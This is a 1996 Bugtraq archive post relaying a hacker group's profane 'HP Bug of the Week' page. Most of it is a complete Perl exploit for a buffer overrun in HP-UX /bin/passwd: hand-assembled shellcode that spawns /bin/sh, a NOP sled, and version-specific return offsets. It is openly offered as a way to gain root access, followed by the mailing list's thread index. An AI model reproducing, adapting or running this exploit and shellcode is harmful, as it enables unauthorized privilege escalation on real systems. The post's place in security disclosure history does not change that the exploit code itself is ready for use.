Bugtraq mailing list archives
HP Bug of the Week!
From: aleph1 () dfw net (Aleph One)
Date: Sat, 23 Nov 1996 08:19:34 -0600
From our SOD friends (http://command.com.inter.net/~sod/); Press D now if
you are easily offended:
This week: If I had a life, I wouldn't spend my Friday nights giving
you bugs
Good fuckin' day, eh? Welcome to the HP Bug of the Week -- if you
haven't come here looking for security holes to HP/UX computers,
you've come to the wrong fucking place. Otherwise look no further
because you've found the fuckin' mecca of the fuckin' desert. Our goal
here is to distribute those HP bugeridoo's as far and wide as is
fucking humanly possible, so tell a friend if you have one. We've got
a root hole from a buffer overrun in /bin/passwd this week, plus a
whole new section called "Other Folks Scripts" that rakes in the
wonderful works of other net.scriptors. So come on in, look around,
take all you want but eat all you take and as always, start clicking
your way to root access with scripts from the motherfuckin' folks at
SOD.
Vulgarity rating: 6 (scalawag)
Caveat Emptor
passwd is broked script for this week
#!/usr/bin/perl
# SOD /bin/passwd buffer overrun
use FileHandle;
sub h2cs {
local($stuff)=@_;
local($rv);
while($stuff !~ /^$/) {
$bob=$stuff;
$bob =~ s/^(..).*$/$1/;
$stuff =~ s/^..//;
$rv.=chr(oct("0x${bob}"));
}
return $rv;
}
open(PIPE,"uname -r|");
chop($rev=<PIPE>);
close(PIPE);
$rev =~ s/^.*\.(.*)\..*$/$1/;
if ($rev eq "10") {
$offset=2102;
$prealign="AA"; # 2 byte pre
$postalign=""; # 0 byte post
$pcoq=h2cs("7b03b463");
} else {
$offset=2170; # 2170 works for 9.X...
$prealign=""; # zero byte pre
$postalign="PP"; # 2 byte post
$pcoq=h2cs("7b033018");
}
$nop=h2cs("08210280");
$code="";
$code.=h2cs("34160506"); # LDI 643,r22
$code.=h2cs("96d60534"); # SUBI 666,r22,r22
$code.=h2cs("20200801"); # LDIL L%0xc0000004,r1
$code.=h2cs("e420e008"); # BLE 4(sr7,r1)
$code.=h2cs("0b5a029a"); # XOR arg0,arg0,arg0
$code.=h2cs("e83f1ffd"); # BL .+8,r1
$code.=h2cs("08210280"); # NOP
$code.=h2cs("34020102"); # LDI 129,rp
$code.=h2cs("08410402"); # SUB r1,rp,rp
$code.=h2cs("60400162"); # STB r0,177(rp)
$code.=h2cs("b45a0154"); # ADDI 170,rp,arg0
$code.=h2cs("0b390299"); # XOR arg1,arg1,arg1
$code.=h2cs("0b180298"); # XOR arg2,arg2,arg2
$code.=h2cs("341604be"); # LDI 607,r22
$code.=h2cs("20200801"); # LDIL L%0xc0000004,r1
$code.=h2cs("e420e008"); # BLE 4(sr7,r1)
$code.=h2cs("96d60534"); # SUB 666,r22,r22
$code.=h2cs("deadcafe"); # Illegal instruction -- dump core if exec fails
$data="/bin/sh."; # Data stuff
$codedata=$code.$data;
$num=int(($offset-length($code)-length($data)-4)/4);
$pre="$nop"x$num;
$of=$prealign;
$of.=$pre.$code.$data.$postalign.$pcoq;
exec("/bin/passwd","$of");
Aleph One / aleph1 () dfw net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
Current thread:
- Re: Security Problems in XMCD 2.1, (continued)
- Re: Security Problems in XMCD 2.1 Alan Cox (Nov 27)
- Administratriva Aleph One (Nov 26)
- A security issue of a different kind. Alan Brown (Nov 26)
- BOOTP/DHCP security itudps (Nov 26)
- Re: BOOTP/DHCP security Alan Cox (Nov 27)
- Re: A security issue of a different kind. Jon Peatfield (Nov 27)
- Re: A security issue of a different kind. Piete Brooks (Nov 27)
- Major Security Vulnerabilities in Remote CD Databases David J. Meltzer (Nov 26)
- Re: Major Security Vulnerabilities in Remote CD Databases itudps (Nov 26)
- lquerypv fix Troy Bollinger (Nov 25)
- HP Bug of the Week! Aleph One (Nov 23)
- HP Bug of the Week: OFS Aleph One (Nov 23)
- Serious BIND resolver problem. Oliver Friedrichs (Nov 18)
- Re: Serious hole in Solaris 2.5[.1] gethostbyname() (exploit Alan Cox (Nov 19)
- Re: Serious hole in Solaris 2.5[.1] gethostbyname() (exploit Joe Zbiciak (Nov 19)
- Re: Serious hole in Solaris 2.5[.1] gethostbyname() (exploit Tim Newsham (Nov 20)